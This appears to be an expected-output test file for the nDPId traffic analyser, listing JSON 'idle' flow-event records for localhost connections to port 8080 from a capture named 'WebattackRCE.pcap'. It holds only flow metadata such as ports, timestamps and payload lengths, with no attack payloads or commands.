00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7580000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
